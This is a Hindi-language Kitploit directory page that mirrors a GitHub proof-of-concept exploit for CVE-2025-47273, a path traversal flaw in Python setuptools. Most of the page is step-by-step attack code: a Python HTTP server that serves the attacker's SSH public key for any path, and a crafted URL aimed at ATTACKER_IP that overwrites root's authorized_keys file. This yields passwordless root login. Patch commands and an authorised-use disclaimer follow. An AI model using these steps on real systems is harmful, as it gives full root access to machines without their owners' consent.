Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-47273-POC — CVE-2025-47273 — setuptools पाथ ट्रैवर्सल PoC | Kitploit
उपकरण/GitHubGitHub/alielkhatteb/cve-2025-47273-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षा
GitHubalielkhatteb/cve-2025-47273-poc

CVE-2025-47273-POC

CVE-2025-47273 — setuptools पाथ ट्रैवर्सल PoC

रिपॉजिटरी देखें
115 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

setuptools पथ ट्रैवर्सल CVE-2025-47273

📖 अवलोकन

Python setuptools < 78.1.1 में पथ ट्रैवर्सल भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट।

PackageIndex घटक के _download_url फ़ंक्शन का दुरुपयोग करके, एक हमलावर फ़ाइल सिस्टम पर किसी भी स्थान पर मनमानी फ़ाइलें लिख सकता है — setuptools चलाने वाली प्रक्रिया के विशेषाधिकारों के साथ।


🎯 भेद्यता सारांश

क्षेत्रविवरण
🎯 लक्ष्यPython setuptools < 78.1.1
🐛 बग वर्गपथ ट्रैवर्सल (CWE-22)
💥 प्रभावमनमानी फ़ाइल लेखन
📍 हमला वेक्टरदुर्भावनापूर्ण पैकेज इंडेक्स URL
🔍 मूल कारणos.path.join() tmpdir को छोड़ देता है जब दूसरा तर्क / से शुरू होता है

📋 पूर्वापेक्षाएँ

  • दोनों मशीनों पर Python 3
  • हमलावर पर SSH कुंजी जोड़ी पहले से उत्पन्न (~/.ssh/id_rsa + id_rsa.pub)
  • लक्ष्य स्क्रिप्ट setuptools PackageIndex को उपयोगकर्ता-नियंत्रित URL के साथ कॉल करती है

🚀 उपयोग

🔧 चरण 1 — अपनी SSH सार्वजनिक कुंजी तैयार करें (हमलावर मशीन)

root@kitploit:~
# Copy your public key to the current directory to serve it
cp ~/.ssh/id_rsa.pub authorized_keys

📡 चरण 2 — दुर्भावनापूर्ण HTTP सर्वर प्रारंभ करें (हमलावर मशीन)

यह सर्वर किसी भी GET अनुरोध पर आपकी सार्वजनिक कुंजी के साथ प्रतिक्रिया करता है — पथ की परवाह किए बिना। setuptools पथ /USER/.ssh/authorized_keys का अनुरोध करेगा लेकिन आपकी कुंजी सामग्री प्राप्त करेगा।

root@kitploit:~
cat > python_server.py << 'EOF'
import http.server
import socketserver

class Handler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Serve authorized_keys regardless of path requested
        self.send_response(200)
        self.end_headers()
        with open("authorized_keys", "rb") as f:
            self.wfile.write(f.read())

with socketserver.TCPServer(("", 80), Handler) as httpd:
    httpd.serve_forever()
EOF

python3 python_server.py

💥 चरण 3 — पथ ट्रैवर्सल ट्रिगर करें (पीड़ित मशीन)

root@kitploit:~
ATTACKER_IP="192.168.1.20"
TARGET_USER="root"

sudo python3 /path/to/vulnerable_script.py \
  "http://${ATTACKER_IP}/%2f${TARGET_USER}%2f.ssh%2fauthorized_keys#egg=evil-1.0"

👾 चरण 4 — रूट के रूप में लॉगिन करें (हमलावर मशीन)

root@kitploit:~
ssh root@VICTIM_IP

कोई पासवर्ड नहीं। सीधा रूट शेल। 🔑


🔒 पैच

संस्करण 78.1.1 इस समस्या को ठीक करता है।

पैकेज प्रबंधककमांड
🐍 pippip install --upgrade setuptools
🐧 Debian/Ubuntusudo apt upgrade python3-setuptools
🎩 RHEL/Fedorasudo dnf upgrade python3-setuptools
🏗️ मैन्युअलsetuptools releases

📎 संदर्भ

  • 🔗 NVD — CVE-2025-47273
  • 🔗 GitHub Advisory — GHSA-5rjg-fvgr-3xxf
  • 🔗 setuptools Fix Commit
  • 🔗 setuptools poc

⚖️ अस्वीकरण और शर्तें

यह प्रूफ ऑफ कॉन्सेप्ट (PoC) कोड केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • कोई अनुमति इस कोड को संशोधित, पुनर्वितरित या किसी अन्य उद्देश्य के लिए उपयोग करने की नहीं दी गई है।
  • अनधिकृत उपयोग या संशोधन अवैध और अनैतिक हो सकता है।
  • लेखक किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेते हैं।
टूल डाउनलोड करें